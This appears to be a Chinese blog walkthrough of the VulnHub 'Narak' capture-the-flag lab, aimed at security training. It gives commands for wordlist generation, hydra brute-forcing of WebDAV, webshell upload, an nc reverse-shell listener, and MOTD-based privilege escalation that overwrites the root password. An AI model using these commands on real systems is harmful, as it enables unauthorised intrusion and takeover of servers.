码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • VulnHub — NARAK


    Description

    Narak is the Hindu equivalent of Hell. You are in the pit with the Lord of Hell himself. Can you use your hacking skills to get out of the Narak? Burning walls and demons are around every corner even your trusty tools will betray you on this quest. Trust no one. Just remember the ultimate mantra to escape Narak “Enumeration”. After getting the root you will indeed agree “Hell ain’t a bad place to be”.

    Objective: Find 2 flags (user.txt and root.txt)

    nmap 扫出来靶场ip 和开放端口 

     

     浏览器访问 ,一堆这个关于题目背景的地狱图片 ,没有什么信息

     扫描一下目录 ,dirsearch 和 dirb都用了一下 ,dirmap倒是没出来

    访问webdav 有东西 

     

    cadaver  —— webdav客户端使用  

    1. cadaver http://192.168.164.130/webdav //连接
    2. put webshell.php //上传

     

    cewl —— 爬行网站创建密码字典

    1. 通过爬取网站获得关键词信息,创建一个密码字典
    2. cewl http://192.168.164.130/ -w 1.txt

     hydra —— 爆破神器,支持众多协议的自动化爆破

    1. hydra -L 1.txt -P 1.txt 192.168.164.130 http-get /webdav
    2. -L 用户名 -P 密码 ip地址 协议 路径

    爆破出 用户名密码了,就可以cadaver 进行连接了 

     连接上,可以 put 一个 webshell ,成功后

     nc ——监听

    nc -lvvp 4444(webshell设置端口)

    然后用刚才的用户名密码 登录这个webshell

     发现nc 成功连接靶机,可以输入命令了 

    已经反弹shell ,执行下面命令进入python交互式 

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    

    这样的话,页面就好看一些了 

     

     BrainFuck 解码后:chitragupt  (应该是某用户的密码)

    用ssh 远程登录 尝试

     成功拿到flag1

    motd 提权

    1. 原理:修改文件 /etc/update-motd.d/00-header
    2. 1, 进入到文件夹 /etc/update-motd.d/
    3. 2, 修改文件 echo "echo 'root:123456'|sudo chpasswd">>00-header
    4. 3, 重新登陆
    5. 4, su root

     前两条命令输入,没反应,就可以重新登陆了

  • 相关阅读:
    约束性统计星号‘*’
    Android 10.0 根据包名屏蔽手势导航左右滑动返回手势
    nlp小白教程:word2vec之数据预处理
    C++入门(c++历史篇)
    【数字通信原理】第六章 频带传输及调制原理
    Python学习(四):多维列表&元组&字典&序列解包
    《Mycat分布式数据库架构》之爬坑之路
    HarmonyOS-静态库(SDK)的创建和使用
    南大通用数据库-Gbase-8a-学习-40-修改字段类型、默认值、非空属性等
    计算机毕业设计django基于python的在线教育平台(源码+系统+mysql数据库+Lw文档)
  • 原文地址:https://blog.csdn.net/qq_61768489/article/details/126786836
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号